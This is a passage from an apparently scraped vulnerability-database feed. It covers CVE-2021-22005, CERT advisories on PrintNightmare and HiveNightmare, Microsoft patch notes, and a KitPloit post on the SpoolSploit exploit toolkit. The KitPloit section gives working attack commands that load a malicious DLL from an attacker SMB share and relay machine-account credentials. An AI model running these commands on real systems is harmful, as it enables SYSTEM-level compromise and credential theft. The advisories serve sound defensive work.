CVE-2021-22005 - VMWare vCenter Server File Upload to RCE\n####...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-25T16:21:56", "type": "githubexploit", "title": "Exploit for Unrestricted Upload of File with Dangerous Type in Vmware Cloud Foundation", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22005"], "modified": "2022-08-13T15:06:43", "id": "AAD2737A-E98E-59B4-8310-3DF28159B7F4", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-23T14:15:18", "description": "# CVE-2021-22005poc\nCVE-2021-22005 vcenter\u4efb\u610f\u6587\u4ef6\u4e0a\u4f20\u6279\u91cf\u9a8c\u8bc1poc\n\n\n\u4e00\u3001\u7528\u6cd5\n\n...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 
5.9}, "published": "2022-02-15T13:11:04", "type": "githubexploit", "title": "Exploit for Unrestricted Upload of File with Dangerous Type in Vmware Cloud Foundation", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22005"], "modified": "2022-03-15T03:51:38", "id": "9B660139-27C8-56B8-B9E2-8124D0E9F502", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}], "cert": [{"lastseen": "2023-12-03T17:25:54", "description": "### Overview\n\nThe Microsoft Windows Print Spooler service fails to restrict access to functionality that allows users to add printers and related drivers, which can allow a remote authenticated attacker to execute arbitrary code with SYSTEM privileges on a vulnerable system.\n\n### Description\n\nThe [RpcAddPrinterDriverEx()](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/b96cc497-59e5-4510-ab04-5484993b259b>) function is used to install a printer driver on a system. One of the parameters to this function is the [DRIVER_CONTAINER](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/353ff796-6fb3-41cf-8b35-0022dd53d886>) object, which contains information about which driver is to be used by the added printer. The other argument, `dwFileCopyFlags`, specifies how replacement printer driver files are to be copied. An attacker can take advantage of the fact that any authenticated user can call `RpcAddPrinterDriverEx()` and specify a driver file that lives on a remote server. 
This results in the Print Spooler service `spoolsv.exe` executing code in an arbitrary DLL file with SYSTEM privileges.\n\nNote that while original exploit code relied on the `RpcAddPrinterDriverEx` to achieve code execution, [an updated version of the exploit](<https://github.com/cube0x0/CVE-2021-1675>) uses [RpcAsyncAddPrinterDriver](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-par/5d864e3e-5d8b-4337-89ce-cb0258ab97cd>) to achieve the same goal. Both of these functions achieve their functionality using [AddPrinterDriverEx](<https://docs.microsoft.com/en-us/windows/win32/printdocs/addprinterdriverex>).\n\nWhile Microsoft has released an [update for CVE-2021-1675](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675>), it is important to realize that this update does **NOT** protect against public exploits that may refer to `PrintNightmare` or CVE-2021-1675.\n\nOn July 1, Microsoft released [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>). This bulletin states that CVE-2021-34527 is similar but distinct from the vulnerability that is assigned CVE-2021-1675, which addresses a different vulnerability in RpcAddPrinterDriverEx(). The attack vector is different as well. CVE-2021-1675 was addressed by the June 2021 security update. \n\n### Impact\n\nBy sending a request to add a printer, e.g. by using `RpcAddPrinterDriverEx()` over SMB or `RpcAsyncAddPrinterDriver()` over RPC, a remote, authenticated attacker may be able to execute arbitrary code with SYSTEM privileges on a vulnerable system. A local unprivileged user may be able to execute arbitrary code with SYSTEM privileges as well. We have created a flowchart to indicate exploitability of PrintNightmare across various platform configurations:\n\n\n\n### Solution\n\n#### Apply an update\n\nMicrosoft has addressed this issue in the [updates for CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>). 
Note that the Microsoft update for CVE-2021-34527 does not effectively prevent exploitation of systems where the [Point and Print](<https://docs.microsoft.com/en-us/windows-hardware/drivers/print/introduction-to-point-and-print>) `NoWarningNoElevationOnInstall` is set to a non-`0` value. Microsoft indicates that systems where `NoWarningNoElevationOnInstall` is set to a non-`0` value are **vulnerable by design.** For systems that do not have the CVE-2021-34527 update installed, or have Point and Print configured insecurely, please consider the following workarounds:\n\n#### Apply a workaround\n\nMicrosoft has listed several workarounds in their [advisory for CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>). Specifically:\n\n#### Microsoft Option 1 - Stop and disable the Print Spooler service\n\nThis vulnerability can be mitigated by stopping and disabling the Print Spooler service in Windows.\n\nIf disabling the Print Spooler service is appropriate for your enterprise, use the following PowerShell commands:\n\n`Stop-Service -Name Spooler -Force`\n\n`Set-Service -Name Spooler -StartupType Disabled`\n\n**Impact of workaround** Disabling the Print Spooler service disables the ability to print both locally and remotely.\n\n#### Microsoft Option 2 - Disable inbound remote printing through Group Policy\n\nDisable the \u201cAllow Print Spooler to accept client connections:\u201d policy to block remote attacks.\n\n**Impact of workaround** This policy will block the remote attack vector by preventing inbound remote printing operations. 
The system will no longer function as a print server, but local printing to a directly attached device will still be possible.\n\n**Note:** The Print Spooler service **must** be restarted for this workaround to be activated.\n\n#### Block RPC and SMB ports at the firewall\n\nLimited testing has shown that blocking both the RPC Endpoint Mapper (`135/tcp`) and SMB (`139/tcp` and `445/tcp`) incoming traffic at a host-based firewall level can prevent remote exploitation of this vulnerability. Note that blocking these ports on a Windows system may prevent expected capabilities from functioning properly, especially on a system that functions as a server.\n\n#### Enable security prompts for Point and Print\n\nEnsure that the Windows Point and Print Restrictions are set to `Show warning and elevation prompt` for both installing and updating drivers in the Windows Group Policy. Specifically the `HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Printers\\PointAndPrint\\` key should have `NoWarningNoElevationOnInstall` and `UpdatePromptSettings` entries that are both set to `0`.\n\n#### Restrict printer driver installation ability to administrators\n\nAfter the Microsoft update for CVE-2021-34527 is installed, a registry value called `RestrictDriverInstallationToAdministrators` in the `HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Printers\\PointAndPrint\\` key is checked, which is intended to restrict printer driver installation to only administrator users. 
Please see [KB5005010](<https://support.microsoft.com/en-us/topic/kb5005010-restricting-installation-of-new-printer-drivers-after-applying-the-july-6-2021-updates-31b91c02-05bc-4ada-a7ea-183b129578a7>) for more details.\n\n### Acknowledgements\n\nThis issue was publicly disclosed by Zhiniang Peng and Xuefeng Li.\n\nThis document was written by Will Dormann.\n\n### Vendor Information\n\n383432\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n### Microsoft __ Affected\n\nNotified: 2021-06-30 Updated: 2021-07-08 **CVE-2021-1675**| Affected \n---|--- \n**CVE-2021-34527**| Affected \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>\n\n \n\n\n### References\n\n * <https://msrc-blog.microsoft.com/2021/07/08/clarified-guidance-for-cve-2021-34527-windows-print-spooler-vulnerability/>\n * <https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675>\n * <https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>\n * <https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/b96cc497-59e5-4510-ab04-5484993b259b>\n * <https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/353ff796-6fb3-41cf-8b35-0022dd53d886>\n * <https://docs.microsoft.com/en-us/windows-hardware/drivers/print/introduction-to-point-and-print>\n * <https://docs.microsoft.com/en-us/windows/win32/printdocs/addprinterdriverex>\n * <https://support.microsoft.com/en-us/topic/kb5005010-restricting-installation-of-new-printer-drivers-after-applying-the-july-6-2021-updates-31b91c02-05bc-4ada-a7ea-183b129578a7>\n * <https://github.com/afwu/PrintNightmare>\n * <https://github.com/cube0x0/CVE-2021-1675>\n * <https://github.com/calebstewart/CVE-2021-1675>\n\n### Other Information\n\n**CVE IDs:** | [CVE-2021-1675 
](<http://web.nvd.nist.gov/vuln/detail/CVE-2021-1675>) [CVE-2021-34527 ](<http://web.nvd.nist.gov/vuln/detail/CVE-2021-34527>) \n---|--- \n**Date Public:** | 2021-06-30 \n**Date First Published:** | 2021-06-30 \n**Date Last Updated: ** | 2021-08-03 15:36 UTC \n**Document Revision: ** | 32 \n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-30T00:00:00", "type": "cert", "title": "Microsoft Windows Print Spooler allows for RCE via AddPrinterDriverEx()", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-08-03T15:36:00", "id": "VU:383432", "href": "https://www.kb.cert.org/vuls/id/383432", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-03T17:25:56", "description": "### Overview\n\nMultiple versions of Windows 10 grant non-administrative users read access to files in the `%windir%\\system32\\config` directory. 
This can allow for local privilege escalation (LPE).\n\n### Description\n\nWith multiple versions of Windows 10, the `BUILTIN\\Users` group is given `RX` permissions to files in the `%windir%\\system32\\config` directory.\n\nIf a VSS shadow copy of the system drive is available, a non-privileged user may leverage access to these files to achieve a number of impacts, including but not limited to:\n\n * Extract and leverage account password hashes.\n * Discover the original Windows installation password.\n * Obtain DPAPI computer keys, which can be used to decrypt all computer private keys.\n * Obtain a computer machine account, which can be used in a [silver ticket attack](<https://www.sans.org/blog/kerberos-in-the-crosshairs-golden-tickets-silver-tickets-mitm-and-more/>).\n\nNote that VSS shadow copies may not be available in some configurations; however, simply having a system drive that is larger than 128GB in size and then performing a Windows Update or installing an MSI will ensure that a VSS shadow copy will be [automatically created](<https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/system-restore-points-disabled#more-information>). 
To check if a system has VSS shadow copies available, run the following command from a privileged command prompt:\n\n`vssadmin list shadows`\n\nA system with VSS shadow copies will report details of at least one shadow copy that specifies `Original Volume: (C:)`, such as the following:\n \n \n vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool\n (C) Copyright 2001-2013 Microsoft Corp.\n \n Contents of shadow copy set ID: {d9e0503a-bafa-4255-bfc5-b781cb27737e}\n Contained 1 shadow copies at creation time: 7/19/2021 10:29:49 PM\n Shadow Copy ID: {b7f4115b-4242-4e13-84c0-869524965718}\n Original Volume: (C:)\\\\?\\Volume{4c1bc45e-359f-4517-88e4-e985330f72e9}\\\n Shadow Copy Volume: \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\n Originating Machine: DESKTOP-PAPIHMA\n Service Machine: DESKTOP-PAPIHMA\n Provider: 'Microsoft Software Shadow Copy provider 1.0'\n Type: ClientAccessibleWriters\n Attributes: Persistent, Client-accessible, No auto release, Differential, Auto recovered\n \n\nA system **without** VSS shadow copies will produce output like the following:\n \n \n vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool\n (C) Copyright 2001-2013 Microsoft Corp.\n \n No items found that satisfy the query.\n \n\nTo check if a system is vulnerable, the following command can be used from a non-privileged command prompt: `icacls %windir%\\system32\\config\\sam`\n\nA vulnerable system will report `BUILTIN\\Users:(I)(RX)` in the output like this:\n \n \n C:\\Windows\\system32\\config\\sam BUILTIN\\Administrators:(I)(F)\n NT AUTHORITY\\SYSTEM:(I)(F)\n BUILTIN\\Users:(I)(RX)\n APPLICATION PACKAGE AUTHORITY\\ALL APPLICATION PACKAGES:(I)(RX)\n APPLICATION PACKAGE AUTHORITY\\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)\n \n Successfully processed 1 files; Failed processing 0 files\n \n\nA system that is not vulnerable will report output like this:\n \n \n C:\\Windows\\system32\\config\\sam: Access is denied.\n Successfully 
processed 0 files; Failed processing 1 files\n \n\nThis vulnerability has been publicly referred to as both HiveNightmare and SeriousSAM, while Microsoft has assigned CVE-2021-36934 to the vulnerability.\n\n### Impact\n\nBy accessing files in the Windows `%windir%\\system32\\config` directory on a vulnerable system with at least one VSS shadow copy of the system drive, a local authenticated attacker may be able to achieve LPE, masquerade as other users, or achieve other security-related impacts.\n\n### Solution\n\nPlease see the [Microsoft bulletin for CVE-2021-36934](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36934>), which contains a workaround. Specifically:\n\n#### Restrict access to %windir%\\system32\\config and remove VSS shadow copies\n\nVulnerable systems can enable ACL inheritance for files in the `%windir%\\system32\\config` directory by running the following command from an elevated prompt:\n \n \n icacls %windir%\\system32\\config\\*.* /inheritance:e\n \n\nOnce the ACLs have been corrected for these files, any VSS shadow copies of the system drive must be deleted to protect a system against exploitation. This can be accomplished with the following command:\n \n \n vssadmin delete shadows /for=%systemdrive% /Quiet\n \n\nConfirm that VSS shadow copies were deleted by running `vssadmin list shadows` again. Note that any capabilities relying on existing shadow copies, such as System Restore, will not function as expected. Newly-created shadow copies, which will contain the proper ACLs, will function as expected. 
Please see [KB5005357](<https://support.microsoft.com/en-us/topic/kb5005357-delete-volume-shadow-copies-1ceaa637-aaa3-4b58-a48b-baf72a2fa9e7>) for more details.\n\n### Acknowledgements\n\nThis vulnerability was publicly disclosed by Jonas Lyk, with additional details provided by Benjamin Delpy.\n\nThis document was written by Will Dormann.\n\n### Vendor Information\n\n506989\n\n### Microsoft: Affected\n\nNotified: 2021-07-20 Updated: 2021-07-20 **CVE-2021-36934**| Affected \n---|--- \n\n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36934>\n\n### References\n\n * <https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36934>\n * <https://support.microsoft.com/en-us/topic/kb5005357-delete-volume-shadow-copies-1ceaa637-aaa3-4b58-a48b-baf72a2fa9e7>\n * <https://twitter.com/jonasLyk/status/1417205166172950531>\n * <https://twitter.com/gentilkiwi/status/1417467063883476992>\n * <https://www.sans.org/blog/kerberos-in-the-crosshairs-golden-tickets-silver-tickets-mitm-and-more/>\n * <https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/system-restore-points-disabled#more-information>\n * <https://doublepulsar.com/hivenightmare-aka-serioussam-anybody-can-read-the-registry-in-windows-10-7a871c465fa5>\n\n### Other Information\n\n**CVE IDs:** | [CVE-2021-36934](<http://web.nvd.nist.gov/vuln/detail/CVE-2021-36934>) \n---|--- \n**Date Public:** | 2021-07-20 \n**Date First Published:** | 2021-07-20 \n**Date Last Updated:** | 2021-07-29 16:29 UTC \n**Document Revision:** | 11 \n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", 
"availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-20T00:00:00", "type": "cert", "title": "Microsoft Windows 10 gives unprivileged user access to system32\\config files", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2021-07-29T16:29:00", "id": "VU:506989", "href": "https://www.kb.cert.org/vuls/id/506989", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "kitploit": [{"lastseen": "2023-12-03T16:47:46", "description": "[](<https://1.bp.blogspot.com/-RH9Wnu2YiuQ/YVi9OZW06YI/AAAAAAAAvWg/V0vRolVeGJAW1XjzaLGce7zf532DLrrQACNcBGAsYHQ/s1325/SpoolSploit_1_SpoolSploit-Usage.png>)\n\n \n\n\nA collection of Windows print spooler exploits containerized with other utilities for practical exploitation.\n\n \n\n\n**Summary** \n\n\nSpoolSploit is a collection of Windows print spooler exploits containerized with other utilities for practical exploitation. 
A couple of highly effective methods would be relaying machine account [credentials](<https://www.kitploit.com/search/label/Credentials> \"credentials\" ) to escalate privileges and execute malicious DLLs on [endpoints](<https://www.kitploit.com/search/label/Endpoints> \"endpoints\" ) with full system access.\n\n[](<https://1.bp.blogspot.com/-RH9Wnu2YiuQ/YVi9OZW06YI/AAAAAAAAvWg/V0vRolVeGJAW1XjzaLGce7zf532DLrrQACNcBGAsYHQ/s1325/SpoolSploit_1_SpoolSploit-Usage.png>)\n\n \n**Getting Started** \n\n\nAs of the release date the SpoolSploit Docker [container](<https://www.kitploit.com/search/label/Container> \"container\" ) has been tested successfully on the latest versions of `MacOS`, `Ubuntu Linux`, and `Windows 10`.\n\nAlthough not required, if you would like to host malicious DLLs or conduct credential relay attacks, all within the SpoolSploit container, you should ensure port 445 is not in use on the host running Docker. This is most prevalent when running this container on a Windows host, as it uses port 445 by default. If disabling port 445 on your host is not practical, that is okay! You can simply run the docker container in a [virtual machine](<https://www.kitploit.com/search/label/Virtual%20Machine> \"virtual machine\" ) that has the network adapter configured in bridge mode. This will allow for serving malicious DLLs and relay credentials. If you only want to serve malicious DLLs, you could simply host the DLLs on an anonymous access share on your host OS or a compromised server share.\n\n \n**Create and access the SpoolSploit Docker container** \n\n\n 1. Clone this repository\n \n \n git clone https://github.com/BeetleChunks/SpoolSploit \n \n\n 2. Build the SpoolSploit Docker container image\n \n \n cd SpoolSploit \n sudo docker build -t spoolsploit . \n \n\n 3. Create and start the SpoolSploit Docker container\n \n \n sudo docker run -dit -p 445:445 --name spoolsploit spoolsploit:latest \n \n\n 4. 
Attach to the container\n \n \n sudo docker exec -it spoolsploit /bin/bash \n \n\n \n**Command-line Usage** \n\n \n \n usage: spool_sploit.py [-h] -a {spoolsample,nightmare} -rH RHOST -rP {139,445} [-lH LHOST] [-lS LSHARE] -d DOMAIN -u USER -p PASSWD \n \n optional arguments: \n -h, --help show this help message and exit \n -a {spoolsample,nightmare}, --attack {spoolsample,nightmare} \n Attack type to execute on target(s). \n -rH RHOST, --rhost RHOST \n Remote target IP, CIDR range, or filename (file:<path>) \n -rP {139,445}, --rport {139,445} \n Remote SMB server port. \n -lH LHOST, --lhost LHOST \n Listening hostname or IP \n -lS LSHARE, --lshare LSHARE \n Staging SMB share (UNC) \n -d DOMAIN, --domain DOMAIN \n Domain for authentication \n -u USER, --username USER \n Username for authentication \n -p PASSWD, --password PASSWD \n Password for authentication \n \n Example - spoolsample: \n python3 spool_sploit.py -a spoolsample -lH 10.14.1.24 -d evil.corp -u rjmcdow -p 'P4ssword123!' -rP 445 -rH 10.5.1.10 \n \n Example - nightmare: \n python3 spool_sploit.py -a nightmare -lS '\\\\10.14.1.24\\C$\\CreateAdmin.dll' -d evil.corp -u rjmcdow -p 'P4ssword123!' -rP 445 -rH 10.5.1.10 \n \n\n \n**SpoolSample - Capture and relay Windows machine account credentials** \n\n\nThe SpoolSploit Docker container includes [Responder](<https://github.com/lgandx/Responder> \"Responder\" ) for relaying machine account hashes obtained from executing the `spoolsample` attack in SpoolSploit. 
As several great articles exist detailing the process of relaying privileged machine account credentials for privilege escalation, I will not go into those details here.\n\n \n\n\n[](<https://1.bp.blogspot.com/-9iR_vZDcp-8/YVi9c9w_qrI/AAAAAAAAvWk/conVpwxj6zgRd1O4kRGrz-e5xu3jTjLLgCNcBGAsYHQ/s1483/SpoolSploit_2_SpoolSample.gif>)\n\n \n\n\n**PrintNightmare (CVE-2021-1675) - Execute malicious DLLs on Windows targets as SYSTEM** \n\n\nIncluded in the SpoolSploit container is an SMB server implemented via [Impacket](<https://github.com/SecureAuthCorp/impacket> \"Impacket\" ). This server can be used to host malicious DLLs when executing the `printnightmare` attack in SpoolSploit. The default SMB server settings work, but if you want to customize them you can modify the configuration file located at `/home/dlogmas/smbserver/smb-v1.conf`.\n\nThe only thing you need to do is copy your DLL to the SMB server's share folder in the SpoolSploit container. The share path in the container is `/home/dlogmas/smbserver/share/`. The following commands demonstrate how to upload a DLL to the SpoolSploit container and make it accessible to the SMB server.\n \n \n sudo docker cp ./malicious.dll spoolsploit:/home/dlogmas/smbserver/share/ \n sudo docker exec spoolsploit /bin/sh -c 'sudo chown dlogmas:dlogmas /home/dlogmas/smbserver/share/malicious.dll' \n \n\n \n\n\n[](<https://1.bp.blogspot.com/-IqUvx7SXavM/YVi9igITTRI/AAAAAAAAvWs/9nikcO6EzWcW7r2BBW6nLGx3obnPjHIDgCNcBGAsYHQ/s1483/SpoolSploit_3_PrintNightmare.gif>)\n\n \n\n\n**Disclaimer** \n\n\nThis proof-of-concept code has been created for academic research and is not intended to be used against systems except where explicitly authorized. The code is provided as is with no guarantees or promises on its execution. 
I am not responsible or liable for misuse of this code.\n\n \n**Credits** \n \n**SpoolSample - [Microsoft](<https://www.kitploit.com/search/label/Microsoft> \"Microsoft\" ) Feature** \n\n\n * [leechristensen](<https://github.com/leechristensen/SpoolSample> \"leechristensen\" ) discovered the SpoolSample exploit and created a C# POC [SpoolSample](<https://github.com/leechristensen/SpoolSample/tree/master/SpoolSample> \"SpoolSample\" )\n * [3xocyte](<https://gist.github.com/3xocyte> \"3xocyte\" ) created a Python2 SpoolSample POC [dementor](<https://gist.github.com/3xocyte/cfaf8a34f76569a8251bde65fe69dccc#file-dementor-py> \"dementor\" ).\n \n**PrintNightmare - CVE-2021-1675 / CVE-2021-34527** \n\n\n * [cube0x0](<https://github.com/cube0x0> \"cube0x0\" ) created Python PrintNightmare exploit after implementing the MS-PAR & MS-RPRN protocols and API calls in [Impacket](<https://github.com/SecureAuthCorp/impacket> \"Impacket\" ).\n * [Zhiniang Peng](<https://twitter.com/edwardzpeng> \"Zhiniang Peng\" ) & [Xuefeng Li](<https://twitter.com/lxf02942370> \"Xuefeng Li\" ) discovered this exploit.\n \n \n\n\n**[Download SpoolSploit](<https://github.com/BeetleChunks/SpoolSploit> \"Download SpoolSploit\" )**\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-07T11:30:00", "type": "kitploit", "title": "SpoolSploit - A Collection Of Windows Print Spooler Exploits Containerized With Other Utilities For Practical Exploitation", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": 
false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-10-07T11:30:00", "id": "KITPLOIT:232707789076746523", "href": "http://www.kitploit.com/2021/10/spoolsploit-collection-of-windows-print.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "mskb": [{"lastseen": "2023-11-28T09:54:39", "description": "None\n**EXPIRATION NOTICE**\n\n**IMPORTANT** As of 9/12/2023, this KB is only available from Windows Update. It is no longer available from the Microsoft Update Catalog or other release channels. We recommend that you update your devices to the latest security quality update. \n\n**6/21/21**\n**IMPORTANT** This release includes the Flash Removal Package. Taking this update will remove Adobe Flash from the machine. For more information, see the [Update on Adobe Flash Player End of Support](<https://blogs.windows.com/msedgedev/2020/09/04/update-adobe-flash-end-support/>).\n\n**11/17/20** For information about Windows update terminology, see the article about the [types of Windows updates](<https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/standard-terminology-software-updates>) and the [monthly quality update types](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/windows-quality-updates-primer/ba-p/2569385>). To view other notes and messages, see the Windows 10, version 2004 update history [home page](<https://support.microsoft.com/en-us/help/4555932>). 
\n**Note** Follow [@WindowsUpdate](<https://twitter.com/windowsupdate>) to find out when new content is published to the release information dashboard.\n\n## Highlights\n\n * Updates a remote code execution exploit in the Windows Print Spooler service, known as \u201cPrintNightmare\u201d, as documented in [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>).\n\n## Improvements and fixes\n\n**Note:** To view the list of addressed issues, click or tap the OS name to expand the collapsible section.\n\n### Windows 10 servicing stack update - 19041.1081, 19042.1081, and 19043.1081\n\n * This update makes quality improvements to the servicing stack, which is the component that installs Windows updates. Servicing stack updates (SSU) ensure that you have a robust and reliable servicing stack so that your devices can receive and install Microsoft updates.\n\n### Windows 10, version 21H1\n\nThis security update includes quality improvements. Key changes include:\n\n * This build includes all the improvements from Windows 10, version 2004.\n * No additional issues were documented for this release.\n\n### Windows 10, version 20H2\n\nThis security update includes quality improvements. Key changes include:\n\n * This build includes all the improvements from Windows 10, version 2004.\n * No additional issues were documented for this release.\n\n### Windows 10, version 2004\n\nThis security update includes quality improvements. Key changes include:\n\n * Addresses a remote code execution exploit in the Windows Print Spooler service, known as \u201cPrintNightmare\u201d, as documented in [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>). After installing this and later Windows updates, users who are not administrators can only install signed print drivers to a print server. By default, administrators can install signed and unsigned printer drivers to a print server. 
The installed root certificates in the system\u2019s Trusted Root Certification Authorities trust signed drivers. Microsoft recommends that you immediately install this update on all supported Windows client and server operating systems, starting with devices that currently host the print server role. You also have the option to configure the **RestrictDriverInstallationToAdministrators** registry setting to prevent non-administrators from installing signed printer drivers on a print server. For more information, see KB5005010.\nIf you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device.\n\n**Windows Update Improvements** \n \nMicrosoft has released an update directly to the Windows Update client to improve reliability. Any device running Windows 10 configured to receive updates automatically from Windows Update, including Enterprise and Pro editions, will be offered the latest Windows 10 feature update based on device compatibility and Windows Update for Business deferral policy. This doesn't apply to long-term servicing editions.\n\n## Known issues in this update\n\n**Symptoms**| **Workaround** \n---|--- \nWhen using the Microsoft Japanese Input Method Editor (IME) to enter Kanji characters in an app that automatically allows the input of Furigana characters, 